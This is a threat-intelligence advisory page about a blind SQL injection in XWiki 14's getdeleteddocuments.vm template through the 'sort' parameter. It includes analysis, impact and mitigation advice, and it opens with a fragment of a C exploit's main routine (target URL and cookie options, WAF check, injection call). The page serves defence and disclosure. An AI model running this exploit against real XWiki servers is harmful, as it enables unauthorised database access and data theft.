]\e[0m\n"; int s = 0; while (name[s] != '\0') { printf("%c", name[s]); fflush(stdout); usleep(100000); s++; } printf("---------------------------------------------------------------------\n"); struct argparse_option options[] = { OPT_HELP(), OPT_STRING('u', "url", &yourUrl, "Target Url (Base URL)"), OPT_STRING('c', "cookies", &cookies, "cookies File"), OPT_BOOLEAN('v', "verbose", &verbose, "Verbose Mode"), OPT_END(), }; struct argparse argparse; argparse_init(&argparse, options, NULL, 0); argparse_parse(&argparse, argc, argv); if (!yourUrl) { printf("\e[1;31m[-] Please Enter Your Url !\e[0m\n"); printf("\e[1;31m[-] Ex : ./exploit -u http://URL\\e[0mn"); printf("\e[1;31m[-] Exit Syscall\e[0m\n"); exitAssembly(); } checkWaf(yourUrl); printf("---------------------------------------------------------------------\e[0m\n\n"); printf("[+] Start Exploit Sql...\e[0m\n"); if (cookies) { selecetCookie = 1; } if (verbose) { verbose = 1; } injection(yourUrl); return 0; }
XWiki 14 - SQL Injection via getdeleteddocuments.vm
Description
XWiki 14 - SQL Injection via getdeleteddocuments.vm
AI-Powered Analysis
Technical Analysis
The reported security threat concerns an SQL Injection vulnerability in XWiki version 14, specifically via the getdeleteddocuments.vm component. XWiki is an open-source enterprise wiki platform widely used for collaborative content management. The vulnerability arises from improper sanitization or validation of user input within the getdeleteddocuments.vm template, which likely constructs SQL queries dynamically. An attacker can exploit this flaw by injecting malicious SQL code through crafted input parameters, potentially allowing unauthorized access to the underlying database. This can lead to data leakage, unauthorized data modification, or even complete compromise of the database backend. The presence of exploit code written in C indicates that a proof-of-concept or weaponized exploit exists, facilitating exploitation by attackers. Although no specific affected subversions are listed, the vulnerability is tied to XWiki 14, suggesting that all installations running this major version without patches are at risk. No official patches or mitigations are referenced, implying that users should exercise caution and monitor for vendor updates. The exploit targets web application layers, leveraging the server-side Velocity template engine (.vm files) to inject SQL commands, a common vector in web application attacks. Given the medium severity rating and the availability of exploit code, this vulnerability represents a credible threat to organizations using XWiki 14 for internal or external documentation and collaboration.
Potential Impact
For European organizations, the impact of this SQL Injection vulnerability can be significant, especially for those relying on XWiki 14 for knowledge management, documentation, and collaboration. Exploitation could lead to unauthorized disclosure of sensitive corporate information, intellectual property, or personal data, potentially violating GDPR and other data protection regulations. Data integrity may be compromised if attackers modify or delete records, disrupting business operations and damaging trust. Availability could also be affected if attackers execute destructive SQL commands or cause database crashes. Given the collaborative nature of XWiki, compromised systems might serve as a pivot point for further network infiltration or lateral movement. The medium severity suggests that while exploitation requires some technical skill, the presence of public exploit code lowers the barrier for attackers, increasing the risk of opportunistic attacks. Organizations in sectors with stringent compliance requirements, such as finance, healthcare, and government, face heightened risks due to potential regulatory penalties and reputational damage.
Mitigation Recommendations
To mitigate this threat, European organizations should immediately audit their XWiki 14 deployments for the presence of the getdeleteddocuments.vm template and assess exposure to untrusted input. Since no official patches are currently referenced, organizations should: 1) Implement Web Application Firewall (WAF) rules to detect and block SQL injection patterns targeting the vulnerable endpoint. 2) Restrict access to the affected component via network segmentation or authentication controls to limit exposure. 3) Review and sanitize all user inputs processed by Velocity templates, applying strict input validation and parameterized queries where possible. 4) Monitor logs for suspicious activity related to SQL errors or unusual database queries. 5) Engage with the XWiki community or vendor for updates and patches addressing this vulnerability. 6) Consider temporary disabling or restricting the getdeleteddocuments.vm functionality if feasible until a fix is available. 7) Conduct penetration testing focused on SQL injection vectors to verify the effectiveness of mitigations.
Affected Countries
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Edb Id
- 52384
- Has Exploit Code
- true
- Code Language
- c
Indicators of Compromise
Exploit Source Code
Exploit code for XWiki 14 - SQL Injection via getdeleteddocuments.vm
# Exploit Title: XWiki 14 - SQL Injection via getdeleteddocuments.vm # Google Dork: N/A # Date: 28 July 2025 # Exploit Author: Byte Reaper # LinkedIn: N/A # Vendor Homepage: https://www.xwiki.org # Software Link: https://www.xwiki.org # Version: XWiki Platform ≤ 14.x # Tested on: XWiki Platform ≤ 14.x # CVE: CVE-2025-32429 ## Vulnerability Description A blind SQL Injection vulnerability exists in the XWiki Platform’s `getdeleteddocuments.vm` template, specifically via the `sort` parameter. The... (23745 more characters)
Threat ID: 688824f4ad5a09ad00897134
Added to database: 7/29/2025, 1:33:40 AM
Last enriched: 8/25/2025, 1:24:18 AM
Last updated: 8/31/2025, 2:40:47 AM
Views: 24
Related Threats
MobSF Security Testing Tool Vulnerability Let Attackers Upload Malicious Files
CriticalSilver Fox APT Exploits Signed Windows Driver to Deliver ValleyRAT Malware
HighResearchers Show Hidden Commands in Images Exploit AI Chatbots and Steal Data
HighZERO-DAY ALERT: Automated Discovery of Critical CWMP Stack Overflow in TP-Link Routers
CriticalWhatsApp 0-Day Exploited in Attacks on Targeted iOS and macOS Users
HighActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.